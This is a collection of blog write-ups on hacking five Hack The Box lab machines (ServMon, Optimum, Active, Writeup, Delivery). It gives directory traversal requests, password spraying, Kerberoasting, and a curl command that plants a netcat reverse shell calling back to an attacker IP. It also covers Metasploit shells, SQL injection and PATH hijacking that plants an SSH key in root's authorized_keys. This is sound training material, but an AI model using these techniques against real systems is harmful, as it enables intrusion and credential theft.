Once connected to the VPN, I spawned the box and sent it a ping request to check it was online. Then, I performed a Nmap scan against all ports and requested service versions. Furthermore, I told it to run default scripts gave it a minimum packet rate of 10000, and saved the output in all formats. As a result, I learned that there were several ports open including FTP which supports anonymous FTP, SSH, HTTP, SMB, and a bunch of RPC ports.
Starting with the lowest port, I used wget to download everything from the anonymous FTP server. As a result, I downloaded 2 files from the user’s directory. One belonging to Nadine named Confidential.txt and one belonging to Nathan called Notes to do.txt. The Confidential.txt file in Nadine’s directory was a note to Nathan that said the following:
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
The Notes to do.txt file found in Nathan’s directory was a todo list that said the following:
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
I felt this was quite valuable information. First, I learned that there were two users, one called Nadine and one called Nathan. Next, I learned that there were a number of services including NSClient, NVMS, and Sharepoint. Furthermore, I know that the password for NVMS has recently been changed, and that NVMS is publically accessible.
Since SSH is never the intended attack vector, I moved to the next numerical port which was port 80 for HTTP. Upon navigating to the IP address in the Burp browser, A page loaded titled NVMS-1000. After performing a quick Google search, I learned that NVMS-1000 is a monitoring client specifically designed for network video surveillance. I had a quick skim through the documentation but unfortunately, there are no default credentials as the user defines them when performing the installation. I attempted some weak credentials such as admin:admin but was unsuccessful.
Next, I navigated to the NSClient page on port 8443. The official walkthrough shows this as having a login form but when I visited it, it didn’t. I couldn’t seem to interact with anything either and there did appear to be an error. Hopefully, this shouldn’t be a problem.
The notes from FTP specifically referenced this application so I presume that this is the intended foothold. After a bit more Googling, I found that NVMS-1000 is vulnerable to a directory traversal vulnerability. The vulnerability has the CVE designation of CVE-2019–20085 and could allow threat actors to retrieve files from the remote system. There is also a Python script on ExploitDB. Furthermore, I learned from the notes that Nadine had left a Passwords.txt file on Nathan’s Desktop. Seems like a match made in heaven. I grabbed a request from Burp’s HTTP history and sent it to the Repeater. I modified the request to include the required directory traversal and pointed it at the Passwords.txt file. Sure enough, I was able to retrieve the following passwords from the file.
Request
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1 Host: 10.129.227.75 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: dataPort=6063 Connection: close
Response
HTTP/1.1 200 OK Content-type: text/plain Content-Length: 156 Connection: close AuthInfo:
I now had a list of passwords and potential users. As a result, I created two wordlists, one for the passwords and one for the users containing the usernames root (I’m an optimist), administrator, Nathan, and Nadine. Next, I used crackmapexec to password spray the box with the usernames and passwords. After a few attempts, a login was successful with the Nadine user.
After logging in with SSH, I was pleasantly surprised to find that I could capture the user flag. Admittedly, I suspected that I would have to move laterally to Nathan first to capture it but nope. I moved to the desktop directory and was able to capture the flag. That makes sense since we stole the passwords.txt from Nathans’s desktop. Perhaps Nathan is no longer required.
nadine@SERVMON C:\Users\Nadine>cd Desktop nadine@SERVMON C:\Users\Nadine\Desktop>dir Volume in drive C has no label. Volume Serial Number is 2237-9369 Directory of C:\Users\Nadine\Desktop 02/27/2022 10:45 PM <DIR> . 02/27/2022 10:45 PM <DIR> .. 05/25/2023 11:03 PM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 5,814,657,024 bytes free nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt f18▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓848
ServMon System Enumeration
It’s time to pillage and plunder. After poking around the file system for a bit I noticed the C:\Program Files\NSClient++ directory. Within that directory is a nsclient.ini file which contains the configuration data for the service. The configuration data includes a password.
PS C:\Program Files\NSClient++> type nsclient.ini password = ew2x6SsGTxjRwXOT
Furthermore, it also specifies that the only allowed host is 127.0.0.1 which is the localhost. Perhaps this is why the page was acting janky when I visited it earlier. However, with some SSH tunneling magic, I should be able to trick it into thinking the requests are coming from the host. I used SSH to connect to the host but specified that I wanted to forward port 8443 from the box to 8443 on my attack box.
Unfortunately, it seems the jankyness wasn’t to do with my request not coming from 127.0.0.1. It seems that something is broken server side. The screenshot below shows the mess I was receiving whenever I refreshed the page. It seemed like the server was still loading but it was producing errors.
Not to be deterred, I respawned the box a few times, prematurely contacted support, and then tried a different browser. The login page finally loaded and I was able to log in with the password found in the .ini file.
ServMon Privilege Escalation Setup
I now had access to the portal but had no idea what to do. I read through the privilege escalation documentation offered by searchsploit. After that, I also read through the official walkthrough and watched IppSecs video to get a better understanding of what was going on. It was here that everything started going wrong and I wished I had never started this box. Everyone’s writeup says to put the payloads in C:\temp… Well, guess what… there is no C:\Temp. This box absolutely started getting the better of me to the point I had to walk away from it.
I went through a bunch of walkthroughs and found Yep’s walkthrough which made it seem simple by using the Python script on exploitdb. Sorry Yep but Nope! I got concatenation errors which I didn’t have a clue how to fix. I know I’m complaining a lot but I don’t understand how this is an easy box. This privilege escalation is incredibly frustrating.
What Not To Do
I navigated to settings, and external scripts and clicked add new. Next, I created a new script with the following parameters.
After that, I clicked save, and under the changes menu, I clicked save scripts. Next, I headed to the control menu and clicked reload.
Please note that you should also check that CheckExternalScripts and Scheduler are enabled in the modules section. These were on by default so I didn’t need to change anything but it is a prerequisite to getting the exploit to work.
Once all that was set up, I copied a Nishang reverse shell script to my current working directory and added my IP address.
So I’m going to stop here and say that all of this didn’t work. I took a long break and came back to it. The payloads kept getting caught by Defender and it kept getting frustrating.
ServMon Privilege Escalation
In the end, it was B1nsec’s article that got me through it, thanks dude!. So let’s uncomplicate things. First, I downloaded the 64-bit payload netcat payload onto my attack box. I then set up a Netcat listener on my attack box on port 443. Then, I span up a Python webserver to host the Netcat binary.
┌──(kali㉿kali)-[~/HTB/ServMon] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
On the target box, I created a directory called temp at the root of C. Not sure why I didn’t think to do this earlier. I think I was in tunnel vision mode. Then, I downloaded the 64-bit Netcat binary and saved it as nc.exe.
Once I confirmed it had downloaded correctly, I copied B1nsec’s command to create the payload that executes the NetCat binary with SYSTEM privileges.
PS C:\temp> curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.33 443 -e cmd.ex e" Enter host password for user 'admin': Added revshell as scripts\revshell.bat
Finally… I ran the command to execute the exploit.
PS C:\temp> curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m Enter host password for user 'admin': {"command":"revshell","lines":[{"message":"Command revshell didn't terminate within the timeout period 60s","perf":{}}],"result":3}
The reverse shell connected back to my attack machine and I was able to capture the root flag.
┌──(kali㉿kali)-[~/HTB/ServMon] └─$ sudo nc -lvnp 443 [sudo] password for kali: listening on [any] 443 ... whoami connect to [10.10.14.33] from (UNKNOWN) [10.129.179.11] 49695 Microsoft Windows [Version 10.0.17763.864] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami nt authority\system C:\Users\Administrator\Desktop>type root.txt type root.txt d50▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓04a
ServMon Learnings
I said some harsh things about this box during my writeup but in hindsight, the fault was with me. I’m not going to remove those comments because that’s how I felt at the time. This is a good box and once I understood the proper way to perform the privilege escalation, it was easy. The path to foothold was a lot of fun and was fairly simple. The directory traversal was practical and I like how the notes guided you to the file you needed.
The privilege escalation is simple if you do it correctly. Unfortunately, I went down every rabbit hole on the way to getting there. Everything I tried failed and it made me incredibly frustrated. I even started just looking for a flag online so that I could submit it and move on. However, in the end, persistence paid off. Granted I had to find the answer from another writeup but it taught me a lot along the way. I’m glad that this one is out of the way.
Optimum is an easy Windows box created by ch4p on Hack The Box. In order to own Optimum it is recommended that you have basic knowledge of Windows and knowledge of enumerating ports and services. By owning this box you will learn to identify vulnerable services, identify known exploits, and basic Windows privilege escalation techniques. Hello world, welcome to haxez where today I will explain how I compromised Optimum.
Optimum Enumeration
To get started, I spawned the box and then connected to the HTB VPN. Next, I sent a ping to the box to check if it was online and that I could talk to it. Once the box responded, I started a Nmap scan that checked all ports, requested service versions, and ran default scripts. Then I saved the output in all formats and I set the minimum packet rate to 10,000. The results of the scan indicated that only one port was open. It was port 80 for HTTP and was running HttpFileServer 2.4. Furthermore, Nmap reported that the OS was Windows.
I launched Burp Suite and opened the browser. Next, I navigated to the IP address of the box which presented me with what appeared to be a file browser. There was a login option at the top of the page, the current directory, a search box, and a few other tools. At the bottom of the list of options, it confirmed that it was HttpFileServer 2.3.
I ran whatweb against the application to try and get more information. From the results, I learned that it was Rejetto file server. Furthermore, it also confirmed the server version and provided me with a few other bits of information. I also ran Nikto against the application but it didn’t come back with anything interesting.
whatweb -a3 http://10.129.179.177 -v
Foothold
I used searchsploit to search for exploits that affected Rejetto and sure enough a few remote code execution vulnerabilities. Furthermore, there was a Metasploit module for the exploit which should make life easier. I could attempt to perform the exploit manually but I’m short on time today so I will use the Metasploit module.
I launched Metasploit and searched for Rejetto. It was the only result so I told Metasploit to use it and then configured it. For example, I set the remote host to the IP of the box and the local host to my tun0 interface. Furthermore, I set the local port to 443 and then ran the exploit. Within a few seconds, I received a meterpreter reverse shell. I should note here that I tried a few other local ports which didn’t work.
From here, I was able to drop to a shell and capture the user flag from the C:\Users\kostas\Desktop directory.
meterpreter > shell C:\Users\kostas\Desktop>type user.txt type user.txt 8a5▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓0ce
Optimum Privilege Escalation
I used ctrl z to background return back to a meterpreter shell and then ran sysinfo. The target system was a 64-bit system but our meterpreter shell was only 32-bit. As a result, I ran ps to look for a 64-bit process to hijack. Explorer.exe was running and was 64bit so I told meterpreter to migrate to that process which was completed successfully.
Next, I used ctrl z to background the meterpreter session and searched for local exploit suggester in Metasploit. Once I found the correct module, I told Metasploit to use it and then listed out my sessions. I then configured the exploit suggester to use session 1 and ran it. And…. it hung.
My session was still active but I decided to switch out the payload for a 64-bit version and exploit it again. Perhaps the migration didn’t go smoothly. By switching to the 64-bit payload, my hope was that the local exploit suggester would run better.
set payload windows/x64/meterpreter/reverse_tcp
I then sent the meterpreter session to the background again and configured the local_exploit_suggester to use session 2. This time it worked and was much quicker than the first time I attempted it. There were a number of exploits that looked good but I accidentally tried to background Metasploit which killed the process so I had to start again. All on me that one. Fail.
Finally, after exploiting the box again I set the payload to the ms16_032 one. I then configured it to use tun0 (if you don’t do this, it won’t work). Then I ran the exploit and after some janky-looking text, I got a reverse shell and was able to capture the root flag.
meterpreter > shell Process 1592 created. Channel 1 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>cd C:\Users\Administrator\Desktop cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt 2a8▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓24e
Optimum Learnings
Optimum is a fun and quick box that I enjoyed every step of the way. It’s strange, I’ve had the user flag for a while and I can’t remember why I didn’t get the root. It was likely a combination of the 32-bit payload not working and my lack of knowledge early on. However, revisiting it today was a blast. I want to come back to it and attempt it without using Metasploit. It was a great box to do just before starting my 9–5. I feel like this is a perfect difficulty level for easy boxes.
The foothold was fairly simple although I had some issues when using higher local port numbers. Once on the box, the privilege escalation was easy once I switched to the 64-bit payload. Granted, you won’t learn much unless you go and research the exploits yourself but I feel like easy boxes should be learning to use tools more than anything. Anyway, thanks for the box.
Active is an easy Windows box created by eks & mrb3n on Hack The Box. The skills required to complete this box are a basic knowledge of Active Directory authentication and shared folders. By completing this box you will learn SMB enumeration techniques, Group Policy Preferences Groups.xml enumeration and exploitation, Identification, and exploitation of Kerberoastable accounts. Hello world, welcome to Haxez where today I will explain how I hacked Active.
Enumerating Active
Once connected to the VPN, I pinged the box to check if I could talk to it and then proceeded to run the standard Nmap scan. I scanned all ports, requested versions, ran default scripts, and saved the output in all formats. Looking at the results I suspected that the box was a Domain Controller as it had all the usual suspects. DNS, Kerberos, LDAP, and SMB were all open so there was plenty to get started with.
sudo nmap -sC -sV -p- 10.129.193.5 --min-rate 10000 -oA active
Active Server Message Block Enumeration
I ran smbmap against the box to see whether I could access any shares. Sure enough, I had read-only access to the Replication share. Next, I attempted to connect to the replication anonymously with smbclient. That worked so I turned recursive mode on, turned prompts off, and downloaded all the files. While the files were downloading I noticed a file named Groups.xml. In earlier versions of Windows, the Group Policy Preferences feature stored passwords and other sensitive information related to local groups in an XML file called “Groups.xml.”
smbmap -H 10.129.193.5
smbclient //10.129.193.5/Replication smb: \> RECURSE ON smb: \> PROMPT OFF smb: \> mget *
I checked the Groups.xml file and found the value of the cpassword variable. Then, I used gpp-decrypt to decrypt the password which identified the password as GPPstillStandingStrong2k18.
Authenticated Active Server Message Block Enumeration
Now that I had a password, I ran smbmap again to see whether I had access to any additional shares. As you can see from the screenshot below, I now had read-only access to a few additional shares including the Users directory.
As a result, I used smbclient to connect to the Users share to have a look around. After a bit of poking around I found the user.txt flag in the svc_tgs users desktop directory. I downloaded it which allowed me to capture the user flag.
Since I had credentials, I thought the next best step would be to run Bloodhound and see what information I could obtain about the domain. As a result, I used the bloodhound-python tool to collect the data and then imported it into Bloodhound.
Next, I imported the data to Bloodhound and ran a few queries. Unfortunately, it seems that the collection didn’t work as intended. When running the List all Kerberostable Accounts query, I received no results from Bloodhound. It should have shown me that the Administrator user was vulnerable.
Kerberoasting
Even though Bloodhound didn’t show the administrator as being vulnerable to Kerberoasting, I continued with the attack anyway. I will have to come back to it and find out why Bloodhound didn’t find it. Perhaps it was the Python collector doing something funny. Anyway, I ran the GetUsersSPNs.py script from Impaket and was able to grab the administrator hash.
With the password cracked, I was able to use psexec.py to connect to the machine as the Administrator and capture the final flag.
psexec.py active.htb/[email protected] Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation Password: [*] Requesting shares on 10.129.193.5..... [*] Found writable share ADMIN$ [*] Uploading file utdeQdHw.exe [*] Opening SVCManager on 10.129.193.5..... [*] Creating service QIAd on 10.129.193.5..... [*] Starting service QIAd..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt 345▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓1a5
Active Learnings
Overall, I enjoyed this box. It was a great box for reinforcing existing skills such as SMB enumeration. Getting the user flag was easy which is what I want from an easy box. It taught me about the Groups.xml file from GPP so I now know something I didn’t before.
I’m still not sure why Bloodhound didn’t show the Administrator as being Kerbarostable but I might come back to that tonight and take another look. However, I feel that the Bloodhound step could have been avoided anyway if I had just run the right tool. Anyway, great easy box.
Writeup is an easy Linux box created by jkr on Hack The Box. The box has protections in place to prevent brute-force attacks. The skills required to complete this box are enumeration. The skills obtained from completing this box are process enumeration and path hijacking. Hello world, welcome to Haxez where today I will be explaining how I hacked the Hack The Box Writeup box.
Enumerating Writeup
First, I spawned the box and connected my attack box to the Hack The Box lab VPN. Next, I sent a ping to the target to ensure it was online and that I could talk to it. Once the box responded, I performed a Nmap scan targeting all ports. Furthermore, I also requested service versions, told it to run default scripts, gave it a minimum packet rate of 10,000, and told it to save the output in all formats named writeup. As you can see from the screenshot below, ports 22 for SSH and 80 for HTTP were open.
Since SSH was unlikely to be the intended attack vector, I moseyed on over to the web application for a gander. It’s… beautiful! The web application appeared to be an in-development blog for Hack The Box writeups. However, the application was being hit with denial-of-service attacks resulting in DoS protection mechanisms being implemented. The DoS protection blocks any IP that triggers a 400 error in the Apache log.
Domo arigato, Mr Roboto
Dirb, gobuster, ffuf, and other directory and file brute force tools are noisy and would generate 400 errors resulting in an IP ban. Therefore, I had to manually and carefully enumerate the web application. One of the first files I look for when hacking web applications is the robots.txt file. It’s a file that tells search indexing robots to ignore the files contained within it. It prevents pages like admin or log-in from being indexed. However, it’s a double-edged sword as it may disclose sensitive information to malicious threat actors. Navigating to the robots.txt file I found a directory called writeup.
Enumerating Writeup Technologies
I navigated to the writeup directory which presented a basic web application with minimal functionality. There were several links to blog posts and clicking on those blog posts revealed that it was a PHP-based application. Furthermore, a parameter named page was being used to retrieve the blog posts. For example, visiting the following URL would retrieve a blog post called blue http://10.129.95.203/writeup/index.php?page=blue. I used whatweb to identify the CMS or Content Management System. As a result, I learned that it was using a version of CMS-Made-Simple from 2004–2019.
Furthermore, looking at the structure of the CMS I found the location of the changelog file. Navigating to the file revealed the specific version of the CMS being used.
CMS Made Simple Blind SQL Injection Failures
Using searchsploit to search for vulnerabilities impacting CMS Made Simple, I found a blind SQL injection vulnerability. The vulnerability has a CVE designation of CVE-2019–9053. I located the Python script and copied it to my current working directory. You can do this with the searchsploit -m flag to mirror it.
Unfortunately, attempting to run this exploit produced errors regarding print statements. I wasn’t sure what to do here as I’m crap at Python. Fortunately, IppSecs video explained that I needed to install the termcolor module with pip. While this didn’t resolve the problem, it did point me in the right direction.
First, I had to install pip2.7 which I was able to do by following the post >>HERE<<
However, when attempting to install termcolor, I received errors about an egg or something. After a bit more Google searching, I found this post >>HERE<< which explained I needed to upgrade setuptools.
pip install --upgrade setuptools
CMS Made Simple Blind SQL Injection Success
I was finally ready to run the payload. Using the following command, I was able to attack the SQL injection vulnerability and retrieve a salt, username, email address, and password hash. It was awesome watching the script come alive and iterate through the alphabet and pull the information out of the database.
After grabbing the user flag, I started enumerating the system. First, I checked the command history of the jkr user to see if it contained anything interesting. It didn’t. Next, I checked if I could run sudo -l to see what commands jkr could run as sudo. Interestingly, sudo wasn’t found on the system. Finally, I decided to go for the easy option and ran linpeas. I span up a Python webserver and used wget to download it to the /tmp directory. Then, I gave it executable permissions and ran it.
The output kept highlighting the /usr/local path as a privilege escalation vector but I didn’t know why. After a bit more investigation, it seems that the jkr user is part of the staff group. According to the Debian wiki the staff group allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name). As you can see from the screenshot below, /usr/local/bin is also the first path that gets called when executing files.
Writeup Process Enumeration
I’m still getting my head around this privilege escalation method if I’m honest. However, I think I understand it. To explain, the jkr user is a member of the staff group and the staff group has the ability to modify /usr/local/ without root privileges. If I can find a binary that gets executed as root without it using the absolute file path, then I can drop a malicious binary of the same name inside the /usr/local/bin directory. Then, when the conditions are met for the binary to be executed, my malicious binary gets executed with root privileges because my first environmental path is /usr/local/bin.
With that in mind, I ran pspy32 and found that when I log in to SSH with jkr, the run-parts binary is executed without an absolute file path. You can see it in the image below, the third blue line from the bottom.
Next, I checked to see the ownership of the run-parts binary to see if it was owned by root. I used which to locate it and then ran ls -lash to list the permissions. Sure enough, it was owned by root and genuinely appeared to be the only binary not being executed with a full file path.
Writeup Privilege Escalation
In theory, I should now be able to create my own binary or script called run-parts in /usr/local/bin. Then when I SSH to the system as jkr, my malicious run-parts binary will be executed instead of the one in /bin. There are multiple methods that I could have used to do this. For example, I could have created a script that copied the bash binary to /tmp and gave it setuid capabilities (I think). Additionally, I could have created a reverse shell that connected back to my machine. However, I thought the most reliable method was to drop an SSH key in the root user’s authorized_keys file. Plus, this is the method that IppSec used and it seemed to work.
When the script is executed, it creates a file in /tmp called Exploit-Complete. This isn’t required as it’s just a visual indicator to show that the script was executed. Next, it creates the .ssh directory in the root user’s directory. Then, it echos my public key into the root user’s authorized_keys file. Finally, it gives the file 600 permissions. The script is saved as run-parts and saved to /usr/local/bin. I created it using nano.
Once the file was saved, I made it executable by running chmod +x against it. Then I created a new terminal tab and connected back to the box as the jkr user. I checked the /tmp directory and sure enough, the Exploit-Complete file had been created. Hopefully, that means that my public key is now in the root user’s authorized_keys files.
Finally, I connected SSH as the root user using the private key I generated. I was able to login and grab the root flag.
┌──(kali㉿kali)-[~/HTB/Writeup] └─$ ssh -i root [email protected] Last login: Fri Aug 6 08:59:19 2021 root@writeup:~# cat root.txt 786▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓4b4
Writeup Learnings
This was a fun box which I learned a few things from. The first was getting the Python SQL injection payload to work. As soon as I received that first error I immediately thought that I wasn’t going to be able to complete the box. However, after a bit of persistence, the payload worked and left me with a big grin on my face. The cracking was fairly simple but always good to get some practice.
The system enumeration and privilege escalation was interesting. I didn’t know about the staff group before and without guides pointing me in the right direction, I wouldn’t have got it. I’m starting to understand the brilliance of pspy too, without it, I’m not sure how I would have identified the correct binary. Overall this is a good box and has a nice method for practicing different techniques for privilege escalation. You could change your binary to perform different things and then easily trigger it by connecting back to the box. Thanks, jkr, fun box.
Delivery is an easy Linux box created by IppSec on Hack The Box and was released on the 09th Jan 2021. Hello world, welcome to Haxez where today I will be explaining how I hacked Delivery. To complete this box it is recommended that you have basic web enumeration and brute force skills. By completing this box you will learn email impersonation and intermediate password-cracking skills.
Delivery Service Enumeration
First, I connected to the Hack The Box VPN and spawned the Delivery box. After receiving the IP address, I sent it a ping to check that it was online. The box responded to my ping so I performed a Nmap scan to check all ports, request service versions and run default scripts. I set the minimum packet rate to 10000 packets per second and saved the output in all formats. As a result, I learnt that port 22 for Open SSH 7.9, port 80 for Nginx 1.14.2 and port 8065 for an unknown service were open. Furthermore, the SSH banner suggested that the OS was Debian.
I navigated to the application on port 80 by visiting the IP address in my browser. After the application loaded, I saw that it was HTML 5 application that had two options. The first one I looked at was the contact us page. In short, the contact us page explains that unregistered users need to use the help desk to have an email address created. Once the email address has been created, the user will be able to access the MatterMost server.
Next, I clicked the link for the MatterMost server but received an error. The application was redirecting to the domain delivery.htb on port 8065 (the mystery port). However, since that domain doesn’t exist in the real world it can’t resolve. I will fix this in a moment. The other link on the application was for the helpdesk. However, upon clicking the link I received an error as it was also trying to load a domain that didn’t exist.
In order to rectify this, I added the hostname to my host file through the use of echo and tee. Echo will echo the data you provide back to you. Tee will read from standard input and write to standard output and files. After adding the domains to my host file, I refreshed the page and was able to view the intended applications.
┌──(kali㉿kali)-[~/HTB/Delivery] └─$ echo "10.129.207.229 delivery.htb helpdesk.delivery.htb" | sudo tee -a /etc/hosts
Exploiting The Ticketing System
I decided to create a new ticket to test the functionality. First I populated the contact information with bogus data. Then, I completed the CAPTCHA text and clicked Create a ticket. After creating the ticket the web application produced a response advising me of my ticket number. However, the application also informed me that I could reply to the ticket by emailing the address [email protected]. The mailbox appears to be created dynamically for use with the ticketing system.
The MatterMost application required a corporate email address to sign up. I now had a corp email address where I could view its emails through the ticket system. I headed back to the MatterMost application and signed up with the [email protected] email address. Then, MatterMost responded and said that I needed to verify my email address (as most online sites do). I headed back to the ticketing system and could now view the verification email.
Exploring MatterMost
After logging in to MatterMost, there was an option to join the Internal channel. Joining the channel and reading through the messages I learnt that maildeliverer user had a password of Youve_G0t_Mail!. Furthermore, the root user has asked for a program to prevent password reuse. They go on to explain that while certain words may not be found within a wordlist, hashcat rules can be used to crack variations.
With the credentials found in the MatterMost application, I was able to SSH to the box as the maildeliverer user. Once on the box, I was able to capture the user.txt flag.
Since MatterMost is a database-driven web application, there must be a database connection configuration file on the box. After a bit of poking around, I found the database connection details within the /opt/mattermost/config/config.json file in the SqlSettings section.
With the credentials, I was able to log in to MariaDB and query the databases. First, I asked MariaDB to show me the databases. As a result, I learnt that there was a database called mattermost. Next, I told MariaDB to use that database and asked it to show me the tables. The results revealed that there was a Users table. I then asked MariaDB to describe the table so that I could get the columns. Finally, I dumped the contents of a few columns from the Users table.
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p MariaDB [(none)]> show databases; MariaDB [mattermost]> show tables; MariaDB [mattermost]> describe Users; MariaDB [mattermost]> select Id, Username, Password from Users;
Delivery Privilege Escalation
The Users table included the password hash for the root user. After a bit of searching, I learnt that the type of hash was a bcrypt hash. I tried to blast the hash with rockyou.txt but after watching IppSec’s video I learnt that it wouldn’t work. Instead, I took the PleaseSubscribe! password from the MatterMost server and saved it to a file. I then saved the hash to a file and used hashcat with the best64.rule file to crack the hash.
With the password cracked, I was able to switch to the root user and capture the root.txt flag and complete the box.
maildeliverer@Delivery:/opt/mattermost/config$ su root Password: root@Delivery:/opt/mattermost/config# cat /root/root.txt bb6▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓6be
Delivery Learnings
I thought this was a rather unique box compared to other boxes that I’ve completed. The initial foothold didn’t exploit a known vulnerability or configuration issue. It was more about understanding the psychology of the person who created the environment and exploiting their oversights. I thought it was really interesting and hopefully, it has changed the way I will think about security in the future.
The privilege escalation was great, I haven’t used hashcat rules before so I got to learn something new. All I want from completing a box is to learn something new or reinforce existing knowledge. This box fulfilled both of those so I’m happy. I don’t think I would have been able to complete this without the walkthrough but it’s hard to say. Thanks for the Box.